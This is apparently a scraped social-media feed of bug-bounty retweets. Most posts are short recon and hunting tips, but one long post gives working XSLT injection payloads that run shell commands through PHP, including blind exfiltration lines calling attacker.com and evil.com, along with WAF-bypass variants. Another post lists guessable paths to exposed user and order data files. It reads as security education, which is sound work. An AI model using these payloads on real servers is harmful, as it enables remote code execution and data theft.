๐“ข๐“ธ๐“ฌ ๐“๐“ท๐“ช๐“ต๐”‚๐“ผ๐“ฝ ๐“ช๐“ท๐“ญ ๐“๐“น๐“น๐“ต๐“ฒ๐“ฌ๐“ช๐“ฝ๐“ฒ๐“ธ๐“ท ๐“ผ๐“ฎ๐“ฌ๐“พ๐“ป๐“ฒ๐“ฝ๐”‚ ๐“ป๐“ฎ๐“ผ๐“ฎ๐“ช๐“ป๐“ฌ๐“ฑ๐“ฎ๐“ป

๐““๐“พ๐“ซ๐“ช๐“ฒ
Joined December 2024
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
๐ŸšจNew YOUTUBE Video๐Ÿšจ ๐Ÿ™ƒMissed BSides Ahmedabad 0x05 ??? No worries ๐Ÿ˜Žโ€” weโ€™ve got you covered! ๐Ÿ‘๐Ÿป @mcipekciโ€™s talk๐ŸŽ™๏ธ, "Abusing Historical DNS Records for Fun & Profit" is now LIVE ๐ŸŽฅon YouTube! ๐ŸŒ He dives into what DNS is & why it matters โš ๏ธ Shows how it can be abused ๐ŸŽฏ Talks subdomain hijacking & VHost enumeration โ“ Plus, an interactive Q&A with the audience! Donโ€™t miss this info-packed session๐Ÿ”ฅ โ€” watch it now on our YouTube channel! โžก๏ธ๐Ÿ”— piped.video/QnwTkP8VUno?featureโ€ฆ #BSidesAhmedabad #CyberSecurity #Infosec #DNSSecurity #SubdomainHijacking #VHostEnumeration #BugBounty #EthicalHacking #HistoricalDNS #DNSHijacking
1
8
33
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
๐Ÿ’ก Pro tip: Check /cdn-cgi/trace on live hosts โ€” it leaks internal IPs ๐Ÿ‘€ Then scan the range (ASN + naabu) โ†’ reverse DNS (dnsx) = ๐ŸŽฏ hidden subs. Whatโ€™s your secret trick for finding hidden subdomains? ๐Ÿ‘‡ Share it ๐Ÿ‘‡ #bugbounty #recon #infosec
12
80
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
The endpoint was : /storage/users.csv Also try more endpoints like /storage/orders.csv /storage/transactions.csv /storage/reports.csv /storage/customers.csv /storage/backups/users_backup.csv /storage/tables/profiles.csv /storage/tables/roles.csv /storage/tables/invoices.csv
8
86
1
540
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
๐Ÿ’ฅ ADVANCED XSLT INJECTION: From Info Disclosure to RCE ๐Ÿ”ฅ Rare. Powerful. Quiet. This is the kind of injection that silently owns backend XML-based applications. ๐Ÿ“š What Is XSLT Injection? XSLT (Extensible Stylesheet Language Transformations) is used to transform XML documents using a special syntax. If an attacker controls the XSLT document or parts of it, they can: โ€ขRun server-side functions (like php:function) โ€ขExfiltrate internal system info โ€ขAchieve RCE in PHP, file read, or command execution โธป โš™๏ธ Server-Side Behavior (Detection) First, enumerate if XSLT is used by injecting an out-of-context tag like: <xsl:value-of select="system-property('xsl:vendor')"/> If it returns: xsl:vendor = libxslt Or: xsl:version = 1.0 โœ… Youโ€™re dealing with a live XSLT backend โ€” typically PHP + libxslt + DOMDocument + XSLTProcessor. โธป ๐Ÿง  Information Disclosure Injection (Stage 1) ๐Ÿ“„ Payload: Leak Backend Library Info <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:text>Vendor: </xsl:text> <xsl:value-of select="system-property('xsl:vendor')"/> <xsl:text> | Version: </xsl:text> <xsl:value-of select="system-property('xsl:version')"/> </xsl:template> </xsl:stylesheet> โ›๏ธ Confirms backend XSLT processing engine. Most commonly: โ€ขlibxslt โ†’ PHP (via XSLTProcessor) โ€ขMSXML โ†’ .NET โ€ขSaxon โ†’ Java-based โธป ๐Ÿ’ฃ Remote Code Execution (Stage 2) โš ๏ธ Only works when php:function is enabled in PHP libxslt config. โธป ๐Ÿš€ Payload: Execute phpinfo() via XSLT Injection <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="w3.org/1999/XSL/Transform" xmlns:php="php.net/xsl"> <xsl:template match="/"> <xsl:value-of select="php:function('phpinfo')" /> </xsl:template> </xsl:stylesheet> โœ… Will return full phpinfo() output including: โ€ขLoaded modules โ€ขServer paths โ€ขENV variables โ€ขOpen_basedir info โธป ๐Ÿ”“ RCE / Command Execution (Stage 3) ๐Ÿงจ Payload: Execute Shell Commands <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="w3.org/1999/XSL/Transform" xmlns:php="php.net/xsl"> <xsl:template match="/"> <xsl:variable name="cmd" select="'whoami'" /> <xsl:value-of select="php:function('shell_exec', $cmd)" /> </xsl:template> </xsl:stylesheet> ๐Ÿงฌ You can swap whoami with: โ€ขcat /etc/passwd โ€ขcurl attacker.com/exfil?$(hostnamโ€ฆ) โ€ขls -la /var/www/ โธป ๐Ÿ•ณ Bypass Filters / WAF Confusion WAFs may block php:function, but not encoded or obfuscated variants: โœ… Variant: Obfuscated Namespaces xmlns:custom="php.net/xsl" <xsl:value-of select="custom:function('phpinfo')" /> โœ… Variant: CDATA-Based Execution <xsl:text disable-output-escaping="yes"> <![CDATA[<?php system('id'); ?>]]> </xsl:text> Works when XSLT result is injected into an interpreted .php file or template. โธป ๐Ÿ“ค Exfiltration Payload (Blind) <xsl:variable name="cmd" select="'curl evil.com/$(whoami)'" /> <xsl:value-of select="php:function('shell_exec', $cmd)" /> โธป ๐Ÿ›  Real-World Vulnerable Functions (Watch for These in PHP) $xml = new DOMDocument(); $xml->load($user_supplied_xml); $xsl = new DOMDocument(); $xsl->load($user_supplied_xsl); // โ— Injection point $proc = new XSLTProcessor(); $proc->registerPHPFunctions(); // โ— Enables RCE $proc->importStylesheet($xsl); echo $proc->transformToXML($xml);
15
50
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
It's pure happiness when I see anyone find a bug using my tips! It makes my day!
great tip by @XHackerx007 if you are not finding any dll files try this method appNAME.FUZZ.dll. @ctbbpodcast @Bugcrowd #bugbountytips
2
4
72
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
great tip by @XHackerx007 if you are not finding any dll files try this method appNAME.FUZZ.dll. @ctbbpodcast @Bugcrowd #bugbountytips
4
16
2
222
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
5 Ways to escalate your subdomain takeover vulnerability: ๐Ÿค  โ€ข Leaking OAuth/SSO tokens via open URL redirects โ€ข Accessing sensitive session cookies via loose cookie policies โ€ข Exploiting CSRF & CORS vulnerabilities โ€ข Bypassing CSP restrictions
1
8
56
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
GraphQL quick wins (more in next post)! ๐Ÿค  ๐Ÿ‘‡
2
5
31
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
DAY 13/365 - Read more about subdomain takeover intigriti.com/researchers/blโ€ฆ - Reported a CSRF that leads to a 1-click ATO, provided the requested details, which the program asked of, and it's now under review; hoping for the best. - @d3q0w and I were working to escalate it to a 0-click ATO; it partially worked on my end, man, i just need more time to look into it.
2
7
63
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
๐Ÿšจ Bug Bounty Tip This is The Best IDOR Checklist You Need to Master! Credit: @Yass1nMohamed #bugbounty #bugbountytips #CyberSecurity #IDOR #Hacking
1
42
224
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
Years ago, web cache poisoning was a theory few cared about. Now itโ€™s one of the most lucrative attack surfaces in bug bounty programs. I studied 20+ real reports โ€” breaking down: โ€ข โš”๏ธ Techniques โ€ข โš™๏ธ Root causes โ€ข ๐Ÿ’ก Key takeaways Read the full breakdown ๐Ÿ‘‡ medium.com/@Aacle/20-cache-pโ€ฆ
1
15
90
๐“ฅ3๐“ท0๐“ถ๐“ผ๐“ฎ๐“ฌ retweeted
When I condense nine months of research discoveries into a 40-min talk, it can make it seem easy. For a taster of the true experience, watch my battle to solve the 0-CL @WebSecAcademy lab! Research is persistence. piped.video/live/B7p8dIB7bFg
4
46
1
291